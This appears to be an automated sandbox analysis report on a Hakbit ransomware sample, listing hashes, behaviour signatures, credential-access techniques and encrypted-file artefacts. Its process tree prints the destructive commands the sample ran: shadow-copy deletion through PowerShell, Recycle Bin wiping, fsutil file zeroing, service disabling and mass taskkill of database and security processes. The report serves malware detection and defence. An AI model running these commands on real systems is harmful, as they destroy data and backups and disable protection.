Overview
overview
10Static
static
10Archive.zip
windows10-1703-x64
1Dropper/Berbew.exe
windows10-1703-x64
10Dropper/Phorphiex.exe
windows10-1703-x64
10out.exe
windows10-1703-x64
3RAT/31.exe
windows10-1703-x64
10RAT/XClient.exe
windows10-1703-x64
10RAT/file.exe
windows10-1703-x64
7Ransomware...-2.exe
windows10-1703-x64
10Ransomware...01.exe
windows10-1703-x64
10Ransomware...lt.exe
windows10-1703-x64
10Stealers/Azorult.exe
windows10-1703-x64
10Stealers/B...on.exe
windows10-1703-x64
10Stealers/Dridex.dll
windows10-1703-x64
10Stealers/M..._2.exe
windows10-1703-x64
10Stealers/lumma.exe
windows10-1703-x64
10Trojan/BetaBot.exe
windows10-1703-x64
10Trojan/Smo...er.exe
windows10-1703-x64
10Resubmissions
03-09-2024 14:02
240903-rb57sazdqf 1003-09-2024 13:51
240903-q59avszclf 1002-09-2024 19:51
240902-yk8gtsxbpd 1002-09-2024 02:27
240902-cxh7tazflg 1002-09-2024 02:26
240902-cwxc2sygll 1021-06-2024 19:37
240621-yca7cszgnd 1009-06-2024 17:07
240609-vm7rjadd73 1013-05-2024 17:36
240513-v6qblafe3y 1012-05-2024 17:17
240512-vty3zafh5s 10Analysis
-
max time kernel
135s -
max time network
85s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
02-09-2024 02:27
Behavioral task
behavioral1
Sample
Archive.zip
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Dropper/Berbew.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Dropper/Phorphiex.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
out.exe
Resource
win10-20240611-en
Behavioral task
behavioral5
Sample
RAT/31.exe
Resource
win10-20240404-en
Behavioral task
behavioral6
Sample
RAT/XClient.exe
Resource
win10-20240404-en
Behavioral task
behavioral7
Sample
RAT/file.exe
Resource
win10-20240404-en
Behavioral task
behavioral8
Sample
Ransomware/Client-2.exe
Resource
win10-20240404-en
Behavioral task
behavioral9
Sample
Ransomware/criticalupdate01.exe
Resource
win10-20240404-en
Behavioral task
behavioral10
Sample
Ransomware/default.exe
Resource
win10-20240404-en
Behavioral task
behavioral11
Sample
Stealers/Azorult.exe
Resource
win10-20240404-en
Behavioral task
behavioral12
Sample
Stealers/BlackMoon.exe
Resource
win10-20240404-en
Behavioral task
behavioral13
Sample
Stealers/Dridex.dll
Resource
win10-20240404-en
Behavioral task
behavioral14
Sample
Stealers/Masslogger/mouse_2.exe
Resource
win10-20240611-en
Behavioral task
behavioral15
Sample
Stealers/lumma.exe
Resource
win10-20240404-en
Behavioral task
behavioral16
Sample
Trojan/BetaBot.exe
Resource
win10-20240404-en
Behavioral task
behavioral17
Sample
Trojan/SmokeLoader.exe
Resource
win10-20240404-en
General
-
Target
Ransomware/Client-2.exe
-
Size
80KB
-
MD5
8152a3d0d76f7e968597f4f834fdfa9d
-
SHA1
c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e
-
SHA256
69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b
-
SHA512
eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4
-
SSDEEP
1536:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/suIicRtpNf8SgRXt+AacRDVX8C4OntD4acN:SHbigeMiIeMfZ7tOBbFv0CIG0dDh/su0
Malware Config
Extracted
C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
hakbit
Signatures
-
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk Client-2.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4180 sc.exe 3772 sc.exe 3564 sc.exe 1372 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 7108 PING.EXE 7008 cmd.exe -
Kills process with taskkill 47 IoCs
pid Process 4068 taskkill.exe 1724 taskkill.exe 1996 taskkill.exe 4632 taskkill.exe 5068 taskkill.exe 1208 taskkill.exe 1912 taskkill.exe 1872 taskkill.exe 1396 taskkill.exe 4220 taskkill.exe 5072 taskkill.exe 1512 taskkill.exe 716 taskkill.exe 4952 taskkill.exe 2944 taskkill.exe 4720 taskkill.exe 596 taskkill.exe 96 taskkill.exe 312 taskkill.exe 1948 taskkill.exe 4780 taskkill.exe 1964 taskkill.exe 5032 taskkill.exe 4936 taskkill.exe 4316 taskkill.exe 1480 taskkill.exe 4796 taskkill.exe 4120 taskkill.exe 5092 taskkill.exe 4968 taskkill.exe 1120 taskkill.exe 4840 taskkill.exe 4992 taskkill.exe 3920 taskkill.exe 4128 taskkill.exe 3236 taskkill.exe 748 taskkill.exe 3900 taskkill.exe 1824 taskkill.exe 4520 taskkill.exe 308 taskkill.exe 3276 taskkill.exe 3524 taskkill.exe 4116 taskkill.exe 3572 taskkill.exe 3916 taskkill.exe 1400 taskkill.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 6992 notepad.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 7108 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe 3016 Client-2.exe -
Suspicious use of AdjustPrivilegeToken 48 IoCs
description pid Process Token: SeDebugPrivilege 3016 Client-2.exe Token: SeDebugPrivilege 4520 taskkill.exe Token: SeDebugPrivilege 3572 taskkill.exe Token: SeDebugPrivilege 3276 taskkill.exe Token: SeDebugPrivilege 1912 taskkill.exe Token: SeDebugPrivilege 4220 taskkill.exe Token: SeDebugPrivilege 3920 taskkill.exe Token: SeDebugPrivilege 1120 taskkill.exe Token: SeDebugPrivilege 1208 taskkill.exe Token: SeDebugPrivilege 4780 taskkill.exe Token: SeDebugPrivilege 1948 taskkill.exe Token: SeDebugPrivilege 596 taskkill.exe Token: SeDebugPrivilege 4120 taskkill.exe Token: SeDebugPrivilege 4116 taskkill.exe Token: SeDebugPrivilege 3900 taskkill.exe Token: SeDebugPrivilege 5068 taskkill.exe Token: SeDebugPrivilege 4936 taskkill.exe Token: SeDebugPrivilege 4796 taskkill.exe Token: SeDebugPrivilege 3916 taskkill.exe Token: SeDebugPrivilege 1396 taskkill.exe Token: SeDebugPrivilege 4992 taskkill.exe Token: SeDebugPrivilege 2944 taskkill.exe Token: SeDebugPrivilege 4128 taskkill.exe Token: SeDebugPrivilege 96 taskkill.exe Token: SeDebugPrivilege 1824 taskkill.exe Token: SeDebugPrivilege 4632 taskkill.exe Token: SeDebugPrivilege 5032 taskkill.exe Token: SeDebugPrivilege 4840 taskkill.exe Token: SeDebugPrivilege 1512 taskkill.exe Token: SeDebugPrivilege 1480 taskkill.exe Token: SeDebugPrivilege 312 taskkill.exe Token: SeDebugPrivilege 4068 taskkill.exe Token: SeDebugPrivilege 3236 taskkill.exe Token: SeDebugPrivilege 308 taskkill.exe Token: SeDebugPrivilege 716 taskkill.exe Token: SeDebugPrivilege 1872 taskkill.exe Token: SeDebugPrivilege 4968 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 3524 taskkill.exe Token: SeDebugPrivilege 4720 taskkill.exe Token: SeDebugPrivilege 748 taskkill.exe Token: SeDebugPrivilege 3420 powershell.exe Token: SeDebugPrivilege 1400 taskkill.exe Token: SeDebugPrivilege 1964 taskkill.exe Token: SeDebugPrivilege 5072 taskkill.exe Token: SeDebugPrivilege 4316 taskkill.exe Token: SeDebugPrivilege 5092 taskkill.exe Token: SeDebugPrivilege 4952 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3016 Client-2.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 3016 Client-2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3016 wrote to memory of 1372 3016 Client-2.exe 74 PID 3016 wrote to memory of 1372 3016 Client-2.exe 74 PID 3016 wrote to memory of 1920 3016 Client-2.exe 75 PID 3016 wrote to memory of 1920 3016 Client-2.exe 75 PID 3016 wrote to memory of 3564 3016 Client-2.exe 76 PID 3016 wrote to memory of 3564 3016 Client-2.exe 76 PID 3016 wrote to memory of 3772 3016 Client-2.exe 77 PID 3016 wrote to memory of 3772 3016 Client-2.exe 77 PID 3016 wrote to memory of 4180 3016 Client-2.exe 78 PID 3016 wrote to memory of 4180 3016 Client-2.exe 78 PID 3016 wrote to memory of 4220 3016 Client-2.exe 79 PID 3016 wrote to memory of 4220 3016 Client-2.exe 79 PID 3016 wrote to memory of 4796 3016 Client-2.exe 80 PID 3016 wrote to memory of 4796 3016 Client-2.exe 80 PID 3016 wrote to memory of 3524 3016 Client-2.exe 81 PID 3016 wrote to memory of 3524 3016 Client-2.exe 81 PID 3016 wrote to memory of 3276 3016 Client-2.exe 82 PID 3016 wrote to memory of 3276 3016 Client-2.exe 82 PID 3016 wrote to memory of 312 3016 Client-2.exe 83 PID 3016 wrote to memory of 312 3016 Client-2.exe 83 PID 3016 wrote to memory of 308 3016 Client-2.exe 84 PID 3016 wrote to memory of 308 3016 Client-2.exe 84 PID 3016 wrote to memory of 96 3016 Client-2.exe 85 PID 3016 wrote to memory of 96 3016 Client-2.exe 85 PID 3016 wrote to memory of 4520 3016 Client-2.exe 86 PID 3016 wrote to memory of 4520 3016 Client-2.exe 86 PID 3016 wrote to memory of 4128 3016 Client-2.exe 87 PID 3016 wrote to memory of 4128 3016 Client-2.exe 87 PID 3016 wrote to memory of 3920 3016 Client-2.exe 88 PID 3016 wrote to memory of 3920 3016 Client-2.exe 88 PID 3016 wrote to memory of 1396 3016 Client-2.exe 89 PID 3016 wrote to memory of 1396 3016 Client-2.exe 89 PID 3016 wrote to memory of 4632 3016 Client-2.exe 90 PID 3016 wrote to memory of 4632 3016 Client-2.exe 90 PID 3016 wrote to memory of 1400 3016 Client-2.exe 91 PID 3016 wrote to memory of 1400 3016 Client-2.exe 91 PID 3016 wrote to memory of 1120 3016 Client-2.exe 92 PID 3016 wrote to memory of 1120 3016 Client-2.exe 92 PID 3016 wrote to memory of 3916 3016 Client-2.exe 93 PID 3016 wrote to memory of 3916 3016 Client-2.exe 93 PID 3016 wrote to memory of 1964 3016 Client-2.exe 94 PID 3016 wrote to memory of 1964 3016 Client-2.exe 94 PID 3016 wrote to memory of 4968 3016 Client-2.exe 95 PID 3016 wrote to memory of 4968 3016 Client-2.exe 95 PID 3016 wrote to memory of 5068 3016 Client-2.exe 96 PID 3016 wrote to memory of 5068 3016 Client-2.exe 96 PID 3016 wrote to memory of 4992 3016 Client-2.exe 106 PID 3016 wrote to memory of 4992 3016 Client-2.exe 106 PID 3016 wrote to memory of 1996 3016 Client-2.exe 108 PID 3016 wrote to memory of 1996 3016 Client-2.exe 108 PID 3016 wrote to memory of 1724 3016 Client-2.exe 110 PID 3016 wrote to memory of 1724 3016 Client-2.exe 110 PID 3016 wrote to memory of 4780 3016 Client-2.exe 111 PID 3016 wrote to memory of 4780 3016 Client-2.exe 111 PID 3016 wrote to memory of 4068 3016 Client-2.exe 113 PID 3016 wrote to memory of 4068 3016 Client-2.exe 113 PID 3016 wrote to memory of 4840 3016 Client-2.exe 115 PID 3016 wrote to memory of 4840 3016 Client-2.exe 115 PID 3016 wrote to memory of 5072 3016 Client-2.exe 116 PID 3016 wrote to memory of 5072 3016 Client-2.exe 116 PID 3016 wrote to memory of 2944 3016 Client-2.exe 117 PID 3016 wrote to memory of 2944 3016 Client-2.exe 117 PID 3016 wrote to memory of 1824 3016 Client-2.exe 118 PID 3016 wrote to memory of 1824 3016 Client-2.exe 118
Processes
-
C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe"C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe"1⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:1372
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵PID:1920
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
PID:3564
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
PID:3772
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
PID:4180
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4220
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4796
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:312
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:308
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:96
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4520
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4128
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3920
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4632
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1400
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3916
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1964
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4968
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5068
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4992
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:1724
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4068
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4840
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2944
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1480
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1948
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3900
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:596
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4936
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5032
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3236
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:716
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1912
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1208
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4116
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:748
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4720
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1872
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Windows\System32\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- Opens file in notepad (likely ransom note)
PID:6992
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7008 -
C:\Windows\system32\PING.EXEping 127.0.0.7 -n 33⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:7108
-
-
C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:6016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\Ransomware\Client-2.exe2⤵PID:7024
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:7160
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.3MB
MD52a6415dd2d3018147990087747d3bc6d
SHA1c235ad2af8f2455ad687443a169e77db2f7841ab
SHA25612ad448d87c9021b51a19abd7c578ed45e21efbf4f45e36e06f95d3fd4480753
SHA5120b2fce7e144f277a6913be498535dfe3f3cc2f0066be929ee0fb35e88099edd16d1354c59f1955bf7b9d12e45ac51c9ba158a6a833a1a4eeb2e10c83efe7f476
-
C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\MasterDatastore.xml.energy[[email protected]]
Filesize4KB
MD5a8135045089f0a617b8a68598015e313
SHA1a6d75798ba689249354bc67d2e14b0e4021d8606
SHA256ac9bb0e277bdaa1c8edc6b95af3248f596b57c9ffd09870ade94ead6b02d8dfe
SHA51200659094fdc1b6a3dfac9217f5adef1d73bd5d9cd57088ae161c6c97e5ddfcd951ba6577cd3dd7f890f78bafe2b6e3ac45d49e261b265321e97706fd4f3e2546
-
C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\162__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml.energy[[email protected]]
Filesize4KB
MD503b07e985bf72b448c02cb94bb29c53e
SHA1135f884b830d384eaea573db946c15d709787aea
SHA2566ff79671c2fd6f06332241d1881a1363985342e610948c206f45266ee1b28453
SHA512e96c0a925ffff852d960192a0a493401b623111a7d303f757722c5b22b8458577efa31b378522ab8b7ed8bbcd969c52ebc25dd74950802673db65d7219a3d912
-
C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\304__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml.energy[[email protected]]
Filesize480B
MD54c84772e7027f0c4e53aa403e1725aaf
SHA12aa1a1842afe491024eb53fa6b8c8ee2d11a8e93
SHA2565e074b1238bd7e690f1eeb1e007145c76ca13d27f81c1ee83db99b7faa366ded
SHA5129b39288f03bbce56f200bf1eaff6c612226e99eac73b82776272bf5015583f5280711746b26f7723f60aeae86be56640206844ba55f7f388e8c554fb02cdec22
-
C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\619__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml.energy[[email protected]]
Filesize4KB
MD5c29aa5f7897f6f285ad25553ad5715e4
SHA17c69d514399e8721e39109eb41dcf58b53fb026f
SHA256b3c173390fcfbfe5c4a4771e5e6b89787605a0ec8a1753a5be5356fdf5d39dd9
SHA5123839ed96ed758aeee45d521f8831a74c7c46f7318a31d23b038c52b24af7c877ed902bf94ffebe55187298d4031136fdbecc508cbd953e35d6747a722bb0a94a
-
C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\81__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml.energy[[email protected]]
Filesize4KB
MD59bab832df5b9ba035a563fcb49eec2d0
SHA1fd57e542fb47c7a0c56c37bcff71761e8efc61df
SHA256663f8c470e7888b9ed004db3477fdfb65fc96a80e5f1ce95894780d2dbb10725
SHA51288b13e8949f9290b710141bd950862d71056d8148ecd49e938d07db786037bec3da94406a481ee144f16b446152d758b542cd03d25602c652d600dbc311ca532
-
C:\ProgramData\Package Cache\{BF08E976-B92E-4336-B56F-2171179476C4}v14.30.30704\packages\vcRuntimeAdditional_x86\vc_runtimeAdditional_x86.msi.energy[[email protected]]
Filesize180KB
MD57bb8f1dccdca683f8e50c280ccca610f
SHA1ea711ca8fcb6405116d1fdb3dcafdebc102412c8
SHA25635a8afaf9b77e9a273f4546e4a1fff2e9cd921cab2c40a03381b334a8f9ea2ed
SHA512ea355b3e9a5f37d8cff95bfb28ff84e44c821997f6f680752b7ec6ed3a177f1f9218cbbd7b96123c5c45c1a4c986cab25e8a70d972a5b16b14fc9f8515cf01ec
-
Filesize
2KB
MD5b49a31b6e3a6771dbfa29b309842ef4f
SHA16b837a896a3008be212e7a3e297859b06b1d22af
SHA256066845e6408685e957268c1c1bbb2240809c5b5751ae7973235490032eb51d81
SHA512804d493bfafbe4be906dc9bb760839af0dc1e7ff4e15cec1b75c328b982f797ee5910e045d691138bbf8e5bcaba3fcfe354523acd90be3a6180cdae14af19029
-
Filesize
1KB
MD5c40a4212f7879c8fe4c21ad756d904b5
SHA1b58ead9d6286a4408d555dc044bf27631188caa4
SHA25656d060d715f335a47fd950c2492cc358a178b2123f5d34f87dd279e82669352a
SHA51285c8e0a5444a2468ae04c9cc22c54362e7cb64b19879a2f620f76af72b0f9c2d1af9383b1549def92addfecf10686563410c96c5bf5ec4e1690b71cdcd1f971c
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
829B
MD57298cf5272c2f1468d281152ab8a9c22
